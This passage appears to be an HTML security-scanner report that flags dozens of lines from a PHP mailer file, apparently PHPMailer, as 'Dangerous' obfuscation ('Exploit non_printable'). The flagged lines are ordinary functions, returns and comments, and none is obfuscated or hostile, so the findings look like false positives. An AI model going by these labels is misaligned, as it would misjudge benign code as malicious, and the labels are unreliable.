<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
